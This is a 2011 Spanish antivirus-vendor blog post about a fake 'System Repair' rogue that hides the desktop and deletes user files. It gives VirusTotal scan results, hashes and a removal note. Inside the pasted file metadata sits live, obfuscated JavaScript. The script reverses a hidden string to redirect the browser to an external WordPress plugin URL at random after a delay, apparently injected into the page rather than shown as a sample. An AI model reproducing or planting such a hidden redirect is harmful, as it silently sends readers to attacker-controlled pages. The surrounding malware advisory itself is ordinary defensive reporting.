Nueva variante de FAKE TOOL SYSTEM REPAIR POCO CONTROLADA ACTUALMENTE (SOLO 8 DE 43 AV)
Otro FAKE que se recibe al navegar en webs de internet, hackeadas gracias a la vulnerabilidad del SQL, y que indica al usuario estar inseguro y necesitar correr la herramienta de reparacion en cuestion, que es cuando se infecta realmente
En este caso es maldito, porque si bien lo detectamos y eliminamos, restaurando el escritorio (qye oculta mientras está en memoria), lo peor del caso es que elimina ficheros irrecuperablemente, como son los de ALL USERS , links de favoritos y enlaces en la barra de inicio
A partir del ELISTARA 23.63 pasamos a controlar este nuevo Rogue, para lo que conviene arrancar con otro usuario no infectado y lanzar dicha version del ELISTARA (o superior), y tras reiniciar se volverá a disponer del escritorio y se habrá eliminado el malware
File name:
xudtyuhvgsbtgvk.exe
Submission date:
2011-07-13 21:46:40 (UTC)
Current status:
finished
Result:
8 /43 (18.6%)
VT Community
not reviewed
Safety score: –
Compact
Print results
Antivirus Version Last Update Result
AhnLab-V3 2011.07.14.00 2011.07.13 Downloader/Win32.Dapato
AntiVir 7.11.11.125 2011.07.13 –
Antiy-AVL 2.0.3.7 2011.07.13 –
Avast 4.8.1351.0 2011.07.13 –
Avast5 5.0.677.0 2011.07.13 –
AVG 10.0.0.1190 2011.07.13 FakeAlert.AEW
BitDefender 7.2 2011.07.13 –
CAT-QuickHeal 11.00 2011.07.13 –
ClamAV 0.97.0.0 2011.07.13 –
Commtouch 5.3.2.6 2011.07.13 –
Comodo 9372 2011.07.13 –
DrWeb 5.0.2.03300 2011.07.13 –
Emsisoft 5.1.0.8 2011.07.13 –
eSafe 7.0.17.0 2011.07.13 –
eTrust-Vet 36.1.8442 2011.07.13 –
F-Prot 4.6.2.117 2011.07.13 –
F-Secure 9.0.16440.0 2011.07.13 –
Fortinet 4.2.257.0 2011.07.13 –
GData 22 2011.07.13 –
Ikarus T3.1.1.104.0 2011.07.13 –
Jiangmin 13.0.900 2011.07.13 –
K7AntiVirus 9.108.4901 2011.07.13 Trojan
Kaspersky 9.0.0.837 2011.07.13 Trojan-Downloader.Win32.Dapato.ahj
McAfee 5.400.0.1158 2011.07.13 –
McAfee-GW-Edition 2010.1D 2011.07.13 –
Microsoft 1.7000 2011.07.13 –
NOD32 6292 2011.07.13 a variant of Win32/Kryptik.QHT
Norman 6.07.10 2011.07.13 –
nProtect 2011-07-14.01 2011.07.13 –
Panda 10.0.3.5 2011.07.13 Suspicious file
PCTools 8.0.0.5 2011.07.13 –
Prevx 3.0 2011.07.13 –
Rising 23.66.00.03 2011.07.11 –
Sophos 4.67.0 2011.07.13 –
SUPERAntiSpyware 4.40.0.1006 2011.07.13 –
Symantec 20111.1.0.186 2011.07.13 UltraDefragFraud!gen4
TheHacker 6.7.0.1.253 2011.07.12 –
TrendMicro 9.200.0.1012 2011.07.13 –
TrendMicro-HouseCall 9.200.0.1012 2011.07.13 –
VBA32 3.12.16.4 2011.07.13 –
VIPRE 9851 2011.07.13 Trojan.Win32.Generic.pak!cobra
ViRobot 2011.7.13.4567 2011.07.13 –
VirusBuster 14.0.123.0 2011.07.13 –
Additional information
MD5 : 6a61676a560321d185cd4e97ed54704c
SHA1 : 8849a5aeed80978ba01468d375cb3fdc30b8c6e7
File size : 446464 bytes
publisher….: The Wireshark developer community
copyright….: Copyright (c) 2000 Gerald Combs $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:_gram@alumni.rice.edu”>_gram@alumni.rice.edu_ and others
product……: TShark
description..: TShark
original name: TShark.exe
internal name: TShark 1.4.1
file version.: 1.4.1
Dicha version del ELISTARA 23.63 que lo detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 14-7-2011
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.